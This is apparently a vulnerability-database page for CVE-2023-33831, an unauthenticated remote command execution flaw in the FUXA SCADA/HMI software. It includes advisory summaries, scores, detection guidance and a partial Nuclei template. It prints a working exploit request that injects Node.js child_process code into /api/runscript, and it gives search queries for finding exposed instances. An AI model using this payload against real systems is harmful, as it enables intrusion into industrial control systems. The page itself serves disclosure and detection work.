CVE-2023-33831
published 2023-09-18CVE-2023-33831: A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST…
PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
13.75%
96.0th percentile
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| frangoteam | fuxa | — | — |
| frangoteam | fuxa | 0 – 1.1.13 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /api/runscript HTTP/1.1
Content-Type: application/json
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}}
versionFUXA 1.1.13
- →Detect exploitation attempts by monitoring for POST requests to /api/runscript containing 'child_process' or 'exec' in the JSON body — these indicate Node.js RCE abuse of the unauthenticated runscript endpoint. ↗
- →Match HTTP response body for 'Script OK:' on POST /api/runscript responses as a confirmation of successful script execution by the vulnerable endpoint.
- →Detect successful RCE by monitoring GET requests to /_images/<random_6_char_filename> immediately following a POST to /api/runscript — this is the attacker's output exfiltration pattern used in the PoC.
- →Use FOFA/Shodan queries for title='FUXA' or title='fuxa' to identify exposed FUXA instances that may be vulnerable to CVE-2023-33831.
- →The exploit requires no authentication; any unauthenticated POST to /api/runscript with a JSON body containing a 'code' field should be treated as a high-severity alert.
- ·The vulnerable endpoint /api/runscript requires no authentication in FUXA 1.1.13; the 'test': 'true' parameter in the JSON payload is what triggers script execution in the PoC — detection rules should account for this field.
- ·The EPSS score is 0.93354 (99.814th percentile), indicating this vulnerability is very likely being actively exploited in the wild — prioritize detection and patching accordingly.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
ghsa·2023-09-18
CVE-2023-33831 [CRITICAL] CWE-77 A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
OSV
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
osv·2023-09-18
CVE-2023-33831 [CRITICAL] A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
VulnCheck
frangoteam fuxa Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-33831 [CRITICAL] frangoteam fuxa Improper Neutralization of Special Elements used in a Command ('Command Injection')
frangoteam fuxa Improper Neutralization of Special Elements used in a Command ('Command Injection')
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Affected: frangoteam fuxa
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-16&host_type=src&vulnerability=cve-2023-33831; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-33831; https://dashboard.shadowserver.org/statistics/honeypot/
No detection rules found.
Nuclei
FUXA - Unauthenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2023-33831 [CRITICAL] FUXA - Unauthenticated Remote Code Execution
FUXA - Unauthenticated Remote Code Execution
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Template:
id: CVE-2023-33831
info:
name: FUXA - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: |
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
impact: |
Unauthenticated attackers can execute arbitrary Node.js code through the runscript API endpoint, potentially compromising the entire SCADA/HMI system and accessing industrial control data.
remediation: |
Update FUXA to a version newer than 1.1.13 that validates script co
2023-09-18
Published
Exploited in the wild